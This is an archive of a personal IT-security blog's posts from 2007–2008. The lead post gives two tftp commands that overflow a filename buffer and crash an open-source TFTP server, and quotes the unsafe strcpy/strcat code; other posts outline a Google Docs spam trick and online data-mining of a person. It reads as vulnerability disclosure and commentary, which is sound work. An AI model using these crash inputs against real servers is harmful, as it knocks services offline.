I went to a talk by Dave Aitel yesterday at Harvard (notes here, if you're interested). Hopefully more to say on it later, but it definitely helped my burnout by reminding me what I'm really doing in security. (Hint: poring through IDS alerts is not what I signed up for.)

One thing Dave mentioned is that TFTP servers are notoriously buggy, so I thought a nice exercise would be to take a look at one and see if I could find something. I'd been playing around in IDA Pro for a while and I was about sick of it, so I was ready to knock that off and read some actual source code. I went to SourceForge and downloaded the first TFTP server I saw. Sure enough, I had a remote DoS within probably 10 minutes. It can most likely even run code, though I'm not hugely interested in proving it right now. That might make a good rainy day project.

So, rather than go through a bunch of hassle, I just posted it on the bug tracker for the project. Was that bad? I kind of thought it was a tiny bit of code that nobody's probably using, but I just checked and it's had 60,000+ downloads.

If you're interested, the bug report is here. It's pretty simple, you need to successfully TFTP GET a file with a long enough filename to overflow the log message buffer. You can do that by requesting "./" a bunch of times before the filename you want. So, basically something like:

tftp X.X.X.X PUT `perl -e'print "A"x128'`
tftp X.X.X.X GET `perl -e'print "./"x100'`/`perl -e'print "A"x128'`

will cause the server to segfault.

UPDATE 4/3: Haha, oh I suck. Exploit code was posted for this bug a couple days after I made the initial bug report (http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt) and
it's much simpler than I thought.

UPDATE AGAIN: Actually it looks like the code and advisories came out the week BEFORE I made the bug report. Now THAT is a weird coincidence, given that the vulnerable release of the server code has been sitting out there since June 2007. What are the odds? Anyway, original update continues...

Turns out the overflow happens well before I thought it did, and the logging function has nothing to do with it. I'm not sure what I failed to check that made me miss this. Actually, I think what I was doing was looking for a way specifically to overflow the log buffer, rather than the struct that holds the filename in the first place. I likely failed to check the simpler option of just sending a GET long filename at all because that wouldn't have gotten me to where I thought I needed to be in the code. I feel incredibly silly now. I guess in the future I will think harder about what I'm doing and pay more attention to detail.

Specifically, the processRequest function starts by defining two variables:

char logbuff[512];
request req;

The request struct looks like:

struct request
{
timeval tv;
fd_set readfds;
pthread_t threadId;
int m_socket;
BYTE sockInd;
BYTE attempt;
char path[256];
FILE *file;
char *filename;
char *mode;
char *alias;
...

And part of the processRequest function includes an unsafe:

strcpy(req.path, cfig.homes[0].target);
strcat(req.path, req.alias);

So, yeah. Next time just grep for strcpy and strcat.

Lost Code

2008-03-29T11:24:00.004-04:00

I kinda want to post code for a Metasploit module I wrote a while back against ZDI-06-043
(Novell Netware Client Print Provider Buffer Overflow Vulnerability), but I totally can't find a copy of the finished version.

There's an in-progress version archived from the Metasploit mailing list here. I think it's a working version, if I recall, but I was in the process of learning the MSF DCERPC stuff and a lot of it is pretty ugly.

VM Visibility

2008-03-27T08:00:00.002-04:00

Well, the world is catching up. Last summer, I didn't have a simple solution for gaining visibility into traffic between guests on a single virtual host. Recently, I spoke a bit to Montego Networks about their HyperSwitch product, and I have to say I was impressed. The product was officially announced today. As far as I understand it, this product provides all the capabilities I need and more. Assuming it works as advertised, this thing is going to catch on like wildfire. The price is pretty nice, too.

Here's the full press release. The CTO of Montego also maintains a virtualization security blog, which is worth a read.

Things That Aren't Working

2008-03-26T16:53:00.003-04:00

Some weeks, nothing is quite as simple as it ought to be. Such as:

SSH via Perl from a Windows box. Should be just a matter of choosing between Net::SSH2 and Net::SSH::Perl, right? Neither seems to work for me. I can execute commands, but I can't read the output. There's even a module (Net::SSH::W32Perl) which apparently attempts to resolve compatibility issues, but all it really does is flip blocking on and off for the inet socket at certain points in the connection.
Scripting interactions with sudo over SSH. Who knew THIS would be so irritating? The basic problem, I think, is that sudo doesn't read the password from stdin by default. It does have an option to force it to do so, so I just did that. I'm still not able to read the password prompt, though (it's not on stdout or stderr), so I have to kind of fudge it. Did I mention this is all happening in a PHP script that talks to a Bash script which calls SSH to talk to another machine? Yeah. It's kind of a Rube Goldberg contraption.
Performing forensics on a Windows Mobile device. You'd think this would be widely supported, but in fact, it seems it's very POORLY supported. I have a trial version of Device Seizure from Paraben Software, which at least claims to do what I'm trying to do. It keeps wanting to crash during acquisition, though, so we'll see how far we get.
Also had some problems getting the TOC::Oscar module to work right in Perl, but I'll chalk that up to my own laziness in RTFM.

Hmm, that's all kind of embarrassing to post in public.

2008-03-21T11:40:00.000-04:00

An incredibly insightful essay by Bruce Schneier.

Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail.

Dream Job

2008-01-04T16:27:00.000-05:00

Hoff says:

Assuming you were going to stay in the "Information Security" industry, what would you do if you could pack up your office tomorrow and move into shiny new digs in your dream job? What would that be? With whom? Doing what?

Here's my quick, off-the-cuff answer.

This is an easy one. The company itself would be populated by smart, driven people who are truly passionate about security. Two things I'd be happy doing there would be:
1. Pentesting, but in a smart way. As in not just running some automated tools and producing a pretty report. The ideal would be really digging in to try to find the unique holes for a given project. I wouldn't want to waste time coming up with a big report that basically just said "apply the following vendor patches."
2. Research, ideally studying and inventing entirely new vulnerabilities and attacks. Random fuzzing, not so much. (Though I'd take "fuzz until it breaks/write an exploit" work in a second.)

Makes me wonder why I'm not actively pursuing this.

Slashdot comment

2007-12-19T15:16:00.000-05:00

From a Slashdot comment:
Thousands of businesses outsource their IT security every day. Lots of it goes overseas, too. And the best part of it is that it's free. The bad part is they don't know they are outsourcing it at all.

Yes, this is me.

2007-11-16T18:15:00.003-05:00

Yes, I'll admit it, this is me sometimes. I'm working on it. :)

Theo de Raadt on x86 Virtualization

2007-10-25T15:13:00.001-04:00

From: Theo de Raadt <deraadt@...>
Subject: Re: About Xen: maybe a reiterative question but ..
Date: Oct 24, 3:14 am 2007

> Virtualization seems to have a lot of security benefits.

You've been smoking something really mind altering, and I think you
should share it.

x86 virtualization is about basically placing another nearly full
kernel, full of new bugs, on top of a nasty x86 architecture which
barely has correct page protection. Then running your operating
system on the other side of this brand new pile of shit.

You are absolutely deluded, if not stupid, if you think that a
worldwide collection of software engineers who can't write operating
systems or applications without security holes, can then turn around
and suddenly write virtualization layers without security holes.

You've seen something on the shelf, and it has all sorts of pretty
colours, and you've bought it.

That's all x86 virtualization is.

Managing your identity online

2007-08-31T11:58:00.000-04:00

Have a look at this.
http://www.google.com/search?q=tyler+krpata

If your name is unique and you spend time online, you probably have thought about how to manage your online persona. It's important to realize that anyone who knows your name, email address, etc. will, with enough effort, find any content that you've made available online. This includes photos, message board posts, blogs, and more. Once you've recognized that, it's up to you to decide how much or how little to say, and where to say it.

I generally put my full, real name on content that I intend to be "public". That is, content that I wouldn't mind a co-worker or my mom taking a look at. I look at this as sort of an online resume. This is also content that I censor, both consciously and subconsciously. You won't find me posting much about what's going on in my life here. You can easily find out where I work and how to contact me, but not likely what I did last weekend. Generally, I try to avoid posting anything publicly online that I wouldn't want everyone to see. I find myself feeling cramped by this self-imposed censorship, but I think it's unavoidable.

Unfortunately, there's more to it than controlling your Google results. A motivated person can iteratively mine data to find your online accounts and aliases where you may not include your full name or email address. It's important in these cases to make sure that any content that you don't want made public requires a login and your approval, or simply again to self-censor.

Myspace is a prime example. Anyone who knows your full name can search for your Myspace profile, even if the profile itself does not contain any identifying information. My Myspace account was recently set to "private" so that you have to be on my friends list to view it. This is an important privacy measure, and one to be aware of.

This is my brother's comment on the issue.

I don't really put effort into keeping things segregated though. I use the same handle for message boards and LiveJournal and all that, and mostly what you get with my real name is my writing. Somebody could probably put it all together, but that wouldn't mean too much.

Let's see, shall we? I'd like to run through some simple steps where we can mine some data. (I'm not going to post his personal information here, though certainly someone with enough motivation could deduce it from my information.)

First, I Google his full name, and get close to 1000 hits.
From the second page, I pull his Amazon profile.
I now have his birthdate and online "nickname".
Luckily, this persona is unique enough that I get about 1500 hits, and some potentially objectionable content posted in forums and messageboards. (Mostly coarse humor.)
I'm also able to pull a LiveJournal based on this search.
Not only that, but someone who was looking could potentially deduce that when they see and "Tyler" in the same place, it's probably me. (And they'd be right.)

So what do I know now? I know what he likes, I know who his friends are, I know how his sense of humor works, I know his political opinions. And I suppose the question is: DOES this mean anything? How much do we want our acquaintances, co-workers, relatives, or total strangers to find out about what we really think? About how we act and speak when we're online? If I make a rude comment or post a dirty joke online, it's no longer just between me and that person; it's between me, that person, and anyone else who cares to look. How much can we be "ourselves" on the Internet when we always have to consider a potential 3rd-party observer?

A cool little trick

2007-08-08T12:48:00.000-04:00

Go to a web site with a few images on the page. For example, go to images.google.com and search for anything. (“tie fighter” would be a cool one.)
Copy the following code, paste it into your browser’s address bar, and press enter (or hit “go”, however you want to do it.) .

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);

Snail Mail Scam

2007-08-03T11:43:00.000-04:00

I won $52,000!!

Well, not really.

Check out the letter and check (to cover "clearance fees"). Sadly, I'm sure MANY people out there are falling for this.

in ur datacenter, breakin ur web 2.0

2007-07-24T17:59:00.001-04:00

So apparently, according to this site, either a power outage or a drunken employee (or both) knocked several popular web sites offline this evening, including LiveJournal, Craigslist, TypePad, and Technorati.

I searched Google News for the name of the datacenter, 365 Main. All I found was COMEDY GOLD.

Which makes me believe that I can no longer use Google for breaking news. I ended up finding this information on Digg, which is a big win for "Web 2.0".

(Despite the fact that Digg seems to be the only "Web 2.0" site up and running right now, that is.)

Wikivice referers

2007-07-19T16:08:00.001-04:00

I was checking out the HTTP referers to Wikivice, and I noticed a handful that came in from this blog.

I didn't even know a handful of people READ this blog.

I love you, whoever you are!

Oddly enough, there were even people coming in from my Twitter post (http://twitter.com/tkrpata), and I *know* nobody reads that!

(Sidenote: I hate writing "HTTP referer," because I'm never sure if I should spell it correctly, or spell it the way it shows up in the HTTP header.)

Wikivice

2007-07-16T13:59:00.001-04:00

Today I launched a new web site called Wikivice (the free advice column that anyone can edit). The idea is that the community will collaborate to write the best answer to a given question, much like on Wikipedia the community collaborates to write the best entry on a given subject.

I'm hoping to get some traffic by word-of-mouth, and go from there. I think this has the potential to be great, but I need to build a solid user community in order for the site to be a success.

http://www.wikivice.com

My OMGWTF Calculator

2007-07-06T11:00:00.000-04:00

A while back, I submitted an entry to the Worse than Failure Olympiad of Misguided Geeks contest. I didn't win, but I thought my entry was somewhat clever.

The contest was to implement a 4-function calculator in the most "WTF" way possible. My entry took advantage of the fact that floating point representation of the correct result of each test case was also an invalid memory address. I performed the calculations in the expected way, but instead of returning the result, I attempted to write to that memory location.

sprintf( (char *) *(int *) &r, "paula = brillant");

There was some amount of type punning that needed to happen in order to maintain the float representation of the result, as you can see.

I set up a signal handler to handle SIGSEGV (segmentation fault), and used setjmp/longjmp to return the invalid address/correct result at a known-good location in the program. I set up a similar handler for SIGFPE (floating point exception) to correctly report an error when attempting to divide by zero. The meat of it occurs in this conditional:

if(sigsetjmp(err_env, 1)) {
SetDisplayText("Err");
} else if(int result = sigsetjmp(ans_env, 1)) {
siginfo_t *sigInfo = (siginfo_t *)result;
sprintf(newText, "%g", *(float *)&sigInfo->si_addr);
SetDisplayText(newText);
} else {
DoOperation(g_Operator, op1, op2);
}

As you can see, the result is contained in the si_addr field of the appropriate siginfo_t struct.

Some of the winners obviously put a lot of thought and time into their entries, and I was very impressed at the creativity they showed. I'm also proud of my little idea, and I had a lot of fun writing it!

Extending IDS into the virtual environment

2007-07-03T13:51:00.001-04:00

I'm going to just credit my colleague Nick for this idea, and maybe someday he can point to this blog post to prove that he thought of it first.

We've been exploring our options for IDS visibility into a virtual switch in order to monitor traffic between VM's; that is, traffic that never shows up on the physical NIC. I've discovered, though I need to confirm, that if you allow a virtual NIC on a VM to enter promiscuous mode on VMWare ESX server, the virtual switch port becomes effectively a span port. Based on this, I've been trying to think of an efficient way to shuttle that sniffed traffic off of the VM and get it where I need it to go.

Nick suggested that perhaps Sourcefire (and IDS vendors in general, too) should just offer a virtual version of their IPS appliance that you can just bring up on your VMWare server. This is so head-slappingly obvious that I can't believe it's not currently an option.

Malicious payload based on user-agent string

2007-06-29T10:06:00.000-04:00

Websense Security Labs has a blog post about a malicious site serving up payloads based on the HTTP user-agent string. This is something I've seen in the wild many times, and I kind of thought it was old news. The easiest way to get around this kind of simple protection is to set the user-agent string sent by wget. You'll want to use the "--user-agent" option, and there is an extensive list of user-agent strings at http://www.user-agents.org.

Pro-tip: a generally malware-ok user-agent string is
Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)

Update: You can also do this.

Virtualization Threats Ahead

2007-06-27T14:30:00.000-04:00

This is exactly a point I've been trying (and failing) to express clearly of late. From How 9 Hot Technologies Can Blow Up In Your Face on InformationWeek.

If organizations keep expanding server virtualization without taking into account what makes virtual machines different from physical ones, they'll open new doors for intruders into the data center. We can't identify the precise nature of the threats, because they haven't yet materialized. But anyone who takes comfort in that fact hasn't been paying attention to information security the past couple of years.

Still not a zealot...

2007-06-21T17:45:00.000-04:00

But about half of Slashdot Is Not Getting It At An Olympic Level.

In summary,

Some guy:

open source = you can see the source

Bruce Perens:

Sigh. I imagine you use some of this Open Source software sometimes. Please try to get your head around the fact that it would not be possible for such software to exist and for folks like you to benefit from it, unless it was developed. And it would not be developed without a developer community, and that community would not be able to do their work unless they had the right to modify and redistribute the software. Thus, Open Source must be more than just visible source code - it has to include the right to distribute and modify, and it also needs the right for you to use it. So, that's 4 things - source, use privilege, distribution privilege, modification privilege and there's a bit more. Years ago, I wrote down what was necessary for software to be Open Source, and OSI uses that Open Source Definition to classify licenses. It is not an arbitrary thing.

Spamming with Google Docs

2007-06-20T16:08:00.000-04:00

I frequently use Google Docs and Spreadsheets to manage and share various documents. I was surprised to log in today and see a document I didn't recognize in my list. When I logged into my email, it turned out that it was a legitimate document shared amongst a group of acquaintances, but it got me thinking. Couldn't a spammer have just as easily have done the same thing, and bypassed my spam filters besides?

I downloaded a "pump and dump" spam image and created a document that looked like this. Then, I added as "viewers" another of my Gmail addresses, a non-Gmail address, and a friend's Gmail and non-Gmail addresses.

In every case, the notification email came right through as "I've shared a document with you called ..." with a link. The social engineering aspects here are:

the email comes from Google
the link goes to Google
the text of the email is familiar and non-threatening, especially to users of Google Docs

It is ultimately NOT difficult to convince a user to click on this link (I probably would), and it's not likely to be filtered as spam.

The additional benefit, of course, is that you can dump documents right into a Google Docs user's main document view without any filtering at all, just by "sharing" the document. Imagine logging in one day to find your list of documents shoved down to make room for a list of docs with titles like "Buy cheap Viagra online!!"

I'm not sure if Google is already watching for accounts that have a high level of document creation/sharing activity, but if not, they probably should be. Additionally, they may want to consider options to allow users to keep newly-shared/unconfirmed documents out of the default view, or to limit who to accept shared documents from at all.

Patching vs. protection

2007-06-15T15:22:00.000-04:00

I recently received a secondhand account of a system administrator's argument against patching Office. Though not a direct quote, the sentiment was essentially this: "Shouldn't our antivirus protect us from having to patch?"

I have a little security angel on my shoulder who cringes when he hears things like this; but I've also got a devil, who asks "well...isn't it true?"

The answer, of course, is an emphatic NO. Antivirus software is able to protect against specific known threats and suspicious behavior, but the important thing it DOESN'T do is close your security holes. Antivirus addresses attacks -- patching addresses vulnerabilities. In a perfect world, we do both; certainly attempting to substitute one for the other is a terrible mistake.

A Quote from Dave Aitel

2007-06-12T17:25:00.000-04:00

Two quotes in a day? This one was too good not to repeat. Dave Aitel had the courage to say it:

...people derisively say "script kiddie" and 100% of the time they mean "someone who's way better at security than I'll ever be".

Too true. There are very few people in the world who can look down on the so-called "script kiddie," and a LOT more than that who THINK they can.

Threat Analysis: Auditors, Obv

2007-06-12T12:55:00.000-04:00

This actually came from a spam email. I assume it originated elsewhere, but I'd never heard it before:
"Hackers may find you; auditors WILL find you."

Career Goals

2007-06-07T10:41:00.000-04:00

This is an email I wrote in a conversation with a friend working in IT security who is considering whether to major in computer science or something more "business and IT" oriented. He asked my advice, so I asked what his career goals were. He replied that he didn't have any, and this was my response.

I didn't edit before posting, so forgive any errors in spelling, grammar, or punctuation.

Goals are critical…they don’t have to be extremely specific, but if you’re doing something like declaring a major, your goals should be at least specific enough to allow you to do so.

So, my long-term career goals are pretty simple, being basically along the lines of “work in IT in a hands-on technical role” which could include programming, systems administration, etc. Point being that it’s not incredibly specific (notice it doesn’t even specify IT security), but it’s enough to let me know that a comp sci degree is in line with my goals.

Keep in mind that career goals don’t need to necessarily be about a specific type of work. Mine are, but only because I’m passionate about IT. Some people may not care what type of work they do, but want to make as much money as possible, for example. Others might want to help people, and would be equally satisfied as a doctor or as a guidance counselor.

Ultimately what I’m getting at is that you should determine what you want your career to accomplish in the larger context of your life, not necessarily what field you want to be in.

That being said, if you’re into pursuing security further, and you’re finding that you prefer the technical aspects of it to the regulatory/administrative aspects (hate to meet the person who preferred the latter), I would definitely major in computer science. Security can be as technical as you can make it, being by necessity and by definition at the cutting edge of technology. The better equipped you are to deal with technology, the more opportunity you have in security. That being said, a computer science degree lays the groundwork, but it’s really important to put in additional work doing certs/training, and definitely to do your own projects/research. A potential employer for, say, a pen-testing job will most likely be more impressed by someone who says “I don’t have a degree, but I discovered 3 remote roots last year and developed and released Tool X and Tool Y.”

RSA ACE/Server, Progress DB ODBC connection

2007-05-25T14:12:00.000-04:00

I'm in the process of trying to enable an ODBC connection to the Progress database embedded in RSA's ACE/Server.

According to the version file on the server, I am running:
PROGRESS PATCH Version 8.3D10 as of September 24, 2001

I ordered the database client and the ODBC driver from Progress, installed, and attempted to set up an ODBC data source.

I initially received an error "Specified driver could not be loaded due to system error 126" when trying to test the connection. I found a tip on a messageboard which instructed me to copy prosql32.dll into c:\windows\system32, which resolved the error.

I received a couple of error messages which were resolved by setting appropriate environment variables:
DLC = C:\DLC
IDLC = %DLC%
PROCFG = %DLC%\PROGRESS.CFG
PROMSGS = %DLC%\PROMSGS
PATH = %PATH%;%DLC%\BIN

I then started receiving:
[MERANT][ODBC PROGRESS driver][PROGRESS]A PROGRESS database server cannot handle a non-Progress database connection. (2664)

I followed the instructions in Progress Knowledge Base article 17204. I am running the oibroker on localhost (it is not available on the server), and have the OID/OIB options hostname set appropriately. The Database Options tab points to the remote host. I am able to connect, but I am not able to authenticate. Error:
[MERANT][ODBC PROGRESS driver][PROGRESS]** Disconnected by the server, code 36. (706)[MERANT][ODBC PROGRESS driver][PROGRESS]** Server rejected login. (700)

The sdserv.lg file on the ACE server says:
14:31:07 SRV 4: Login by my_username rejected: secure client required.

Oddly, it is passing the username that I am logged into the PC with, not the username I entered in the login field.

I think this could potentially work if I had _prooibk (the OI broker binary) available on the server, but it's not there.

I'm out of ideas for now. Waiting for a response back from support. Hopefully they will have some ideas.

EDIT: Support confirmed that the server is requiring an SSL connection, and the SQL-89 ODBC driver does not support SSL. On to plan B...

Reversing Drawball

2007-05-22T15:24:00.001-04:00

I've spent some time lately trying to reverse-engineer the protocol for drawball.com. Granted, the client is in Flash, so in theory I could just decompile it and reverse it that way, but what fun is that?

Here's what I've found so far:

(All communication is in the form of null-terminated strings. The server listens on port 8007.)

Handshake

Upon connecting, the client sends what seems to be an arbitrary 7-byte alpha (mixed upper and lower) string. One string can be reused a few times before a new one is required. I assume it's based on time somehow. For the time being, I've just been using Wireshark to retrieve the key generated and sent by the client. I need to spend more time on this one. ~~I really need to figure out how this is generated, because it's a huge pain to open up the actual client and get a new key every time.~~
EDIT: Duh, got it. "View Source," idiot: <param name="FlashVars" value="l=myvalue">

The server responds with a 14-character string consisting of all uppercase letters.

The client responds with a 7-character string of printable ASCII characters. If the incorrect string is sent, the server disconnects. I figured out that the string is generated by taking each character of the first string sent by the client and subtracting the numeric value (0-25) of every other character in the server response. That's not a very clear explanation...will post the Perl function that performs this operation once I clean it up a bit.

EDIT: Here it is.


sub decode {
    my @seed = split //, shift;
    my @chal = split //, shift;
    my $response;
   
    while(@seed) {
        # get the numeric (0-25) value of the next character of @chal
        my $num = ord(shift @chal) - 65;
        # throw away the next character of @chal
        shift @chal;
        # subtract $num from the next character of @seed, add to response  
        $response .= chr(ord(shift @seed) - $num);
    }  
    return $response;
}

Ink

The client asks the server how much ink it has left by sending a lowercase "i". The server responds with the letter "i", and what appears to be a 4-byte integer. The first byte is always 01; I think it's just there to avoid having any nulls in the response, since communications are in the form of null-terminated strings.

Drawing

To draw, the client sends a packet containing the following data:

ASCII "a" (0x61)
0x1 (seems to be constant, not sure what it's for)
0x1 (same)
a 1-byte sequence number, must start with 1 and increment with each transmission
0x2 (constant, not sure)
color - 4-byte integer, don't know how it's being represented. black is 0x01010101, white is 0x09191908
a sequence of (x,y) coordinates where each coordinate is 3 bytes. the minimum number of coordinate pairs is 2, and the minimum line length is 2 pixels. this will draw a line between each coordinate.

I've successfully managed to automate drawing onto the ball, ~~but I'm not going to be able to do anything really useful until I can figure out how the initial seed is generated.~~

Update: I may have been banned...I can load and navigate the site normally, and I seem to have a normal amount of ink, but any attempt to draw results in an immediate disconnection.

Win32 Perl + Subversion line break hell

2007-04-23T15:22:00.000-04:00

News to me: when Perl writes to a file handle on Win32, it replaces LF with CRLF unless you explicitly call binmode on the file handle. In addition to that, Subversion's "native" setting for eol-style does the same.

To switch SVN over to LF only:
svn propset svn:eol-style LF <filename>

Free as in speech

2007-04-17T10:02:00.000-04:00

I swear I am not a GNU zealot. I use plenty of non-free software, and I have no qualms about it. I do, however, understand and mostly agree with the philosophy behind free software. Practically speaking, I am willing to trade some of my freedom for convenience. I'm not whether that makes me a hypocrite, or whether I am just exercising a different, related freedom.

Edit: In case the link disappears at some point, here are my comments.

In response to:

Do you buy the idea that being "open" makes software more secure, or automatically makes it "better" or somehow morally superior to closed source software?"

I wrote:

The idea of being "open" or "free" (as in speech) is a license issue. It does not make the software anything. It can be good, bad, or indifferent. Whether software is secure or not is not related to whether it's free or not. However, there are inherent characteristics of open/free software that give the user the FREEDOM to be more secure than with closed source, whether or not he or she chooses to exercise that freedom. Non-free software robs you of that freedom. It forces you to make the choice to accept the vendor's security mistakes or not use the software at all. (To quickly address the obvious rebuttal, the freedom to make that choice is not a freedom any more than, say, the freedom to eat rotten meat or starve.)

As far as being morally superior, YES, free software is morally superior to closed software. Richard Stallman has developed and documented this argument well enough that it's not worth repeating here, but I highly recommend you read through and understand the information at http://www.gnu.org/philosophy/.

And in response to the following:

My feeling is that people should use whatever is best for them (however you define "best"). About morality...I think that if two parties willingly agree to licensing terms (whether proprietary, GPL, or anything else) then there is no moral issue. Maybe someone external to that situation would see it as immoral, but that's like some redneck getting offended by a gay couple because it goes against his belief system. Of course the hole in this argument is that proprietary software usually doesn't present a license until installation and most retailers won't accept opened software for return. Regardless, there are always going to be people who get offended by other people due to various belief systems. I could not care less if somebody else uses/writes proprietary, GPL, or other software; my only concern is what I use/write. Issuing a blanket statement like "proprietary software is immoral" is no better than saying that "homosexuality is immoral". For certain belief systems it may be true, but it may not be true for the only belief system that matters: mine. Murder is virtually the only thing seen as immoral by all civilizations. Everything else is up for debate.

I wrote:

Comparing the morality judgement against proprietary software to bigotry against homosexuals is a weak straw man argument. You clearly are not familiar with the reasoning behind the belief that proprietary software is evil/immoral, certainly not enough to decide whether you are for or against such an argument in a rational and objective manner. If you believe that people are entitled to freedom, then proprietary software is inherently immoral. You have the right to believe that people are NOT entitled to freedom, but I would argue THAT would be much more analagous to saying something like "homosexuality is immoral."

QOTD

2007-04-05T22:04:00.000-04:00

"I gave up Perl for Ruby."
"That's like giving up herpes for rabies."
- Anonymous message board exchange

Undocumented builds and backwards incompatibility

2007-04-05T10:25:00.000-04:00

So I spent a lot of yesterday trying to, without any documentation at all, build a Windows executable out of a Python program whose GUI is based on an older version of Qt/PyQt. Unfortunately PyQt 4 is apparently NOT backwards-compatible with PyQt 3, such that the existing scripts would not work with PyQt 4 as they were written. It was an absolute nightmare getting the older versions compiled, installed, and working, and it made me want to document some general thoughts.

My primary function has never been as a developer, but I've still always written code as part of my job responsibilities. People like me (and like the person who wrote the Python program, I imagine), don't generally have the same experience in formal software development processes as "Computer Programmers (TM)". This tends to cause problems.

The interesting thing is that the problems seem to come from dependencies, building, and things of that nature than with the code itself. I think most of the actual code I write, and a lot of the code of this sort that I've read, is more or less self-documenting. I'm talking mostly about utility programs, generally less than 1000 lines and often less than 250 lines.

Notes to self, and other interested parties:

Document your build process if it's anything more complicated than "cc file.c". (I will be forever in your gratitude if you leave me a Makefile.)
Use some sort of central code repository. Digging through backups of old PC's to recover code is no fun for anyone.
Related: don't just leave your code, if at all possible...leave the libraries, utilities, and other related items somewhere where I can find them. At worst, leave me links to go get them.
Create a README file! If you have to solve any problems or come across anything quirky, NOTE THEM IN THE README!
A function called "GetUsername" does not need a comment that reads "Gets the username."

Misc:

Thomas Ptacek is writing a great series of arguments against DNSSEC over at the Matasano Chargen blog. That's one of my favorite blogs, by the way, and I highly suggest that anyone in information security make it a daily read.
I don't have anything to add about the ANI vulnerability (MS07-017), other than to wonder when we're going to stop seeing this kind of thing. Weren't we doing this with WMF at this time last year?
I have thoughts on Fortify's interesting JavaScript hijacking "Web 2.0" advisory, but I think I'll write a separate post 2.0 on that subject 2.0.
The Blogger "Compose" interface is terrible. What should I be using instead? Should I just use a text editor and then paste it in?

SecureWorld Boston

2007-03-27T08:50:00.000-04:00

I attended SecureWorld Boston this month. I'm a little late in posting about it, but here are my thoughts.

The conference in general was not particularly high-tech. I know it's not intended to be a Black-Hat-style cutting-edge techie event, but I still would like to see a presentation or two where I can learn something I don't already know from a technical standpoint.
The very first thing I did there was to drag an old co-worker over to see a demo of CORE Impact. I believe that is hands-down the coolest product going in the security space. It's hard for organizations that don't specialize in pen-testing to justify the price tag, but it sure is nifty. (I am 100% green with envy at the developers who get to write exploits for CORE Impact as a full-time job.)
I spent some time chatting with the Feds. I don't think they realize how in awe most of us IT folks are of their position. Their cybercrime people have a tough and thankless job, that's for sure.
In making the rounds of the vendor booths, I came across two products that I wasn't familar with that impressed me.

BeyondTrust Privilege Manager allows you to granularly assign administrative rights to users. So, where previously you would need to give a user full admin rights to his PC to install or run certain applications, you can now set that account to run as a normal user with elevated privileges only for specific applications. You can manage rights from a central console, and you can assign privileges either by workstation or by username (a huge benefit in an environment where users log onto and share multiple workstations). I'm not sure how much of this you can do with Windows out of the box, not being much of a Windows guy myself, but it seems like something that any organization could benefit from.
LogLogic is a log management/SEM product, and the thing that really struck me about it was the interface. I've used Network Intelligence Envision, as well as Splunk, and I find them both difficult to get useful information out of because the interfaces are a pain to work with. LogLogic looks simple, attractive, and to the point. Every question I could come up with was met with "yes, we do that"; it seems like a full-featured, if pricey, solution.

I accidentally found myself in a panel on IP-based video surveillance. (I got the room number I was looking for wrong.) When I realized I was in the wrong room, I decided I would stay and possibly learn something about an area that I know little to nothing about. The major thing I took out of the panel was that there seems to be little to no thought given to the data security side of putting a bunch of new endpoints on the network (cameras, DVRs, etc). It may just have been that there wasn't enough time to get into that...I found that the panels in general were to short to get any kind of depth on their subjects.
I also attended a panel on compliance, specifically about whether IT should own it or not. Again, there wasn't enough time allotted to get into any kind of depth on the subject, but I think the answer, as expected, was that nobody really knows. Certainly we don't WANT it, but where else is it going to go? More to the point, I think there are too many aspects to compliance to call it an "it." There are technological and procedural controls that need to be designed, implemented, tested, and validated, and I really believe it involves defining the steps involved in all of those in detail to find the best places to put them.
There were a couple of sessions that discussed things like business risk and asset value, basically "how do we justify the money that goes into security?" As IT people, we are still not used to tackling the question of value from a risk perspective. (At least, I'm not, and I don't think I'm alone.) A good, solid, simple methodology that allowed us to get in the ballpark without wasting hundreds of hours in meetings across the organization would go a long way.
And I got a new laptop backpack, thanks to Michael Ford's encyclopedic knowledge of geek movie trivia!

Funnypot

2007-02-23T10:32:00.000-05:00

A while ago, I started a project that tried to extract some humor from the concept of a honeypot. The idea was simple: I put up an SSH server with an easy root password, and created a shell for the root account that would (in theory) induce hapless hackers to type funny things. You can read some of the results at The Funnypot.

The problem was that, for the most part, the attackers either didn't understand what was going on or assumed that there was some magic command they could type that would cause the system to start behaving normally. I'm not sure why you'd keep trying UNIX commands once that shell started responding with lines like "Are you sure you know what you're doing?" I suppose in some cases it was just a script, rather than a human being on the other end of the connection.

Eventually I brought the server down and never bothered putting it back up. I still feel like there's some mileage I can get out of the concept, if I can just be a little funnier. Maybe I need to allow, or at least appear to allow, certain commands to work in order to encourage the intruders. Perhaps some detailed and useful (and by that I mean "silly and ridiculous") help messages would be good, too. I wonder what I could get people to enter in if I put up a help message that said something like "enter your email address and email password at the command prompt to enable the bash shell."

Into the Blogosphere

2007-02-22T16:32:00.000-05:00

For some time now I've been thinking I should start a blog, so here it is. I have a real problem with remembering to write down or otherwise record my ideas and opinions, so hopefully I can learn to stick with this. I imagine I'll mostly be writing about technology, specifically in the realm of IT security, but I won't necessarily limit myself to that. So there's the introductory post; I hope to make my first post with Actual Content(tm) soon.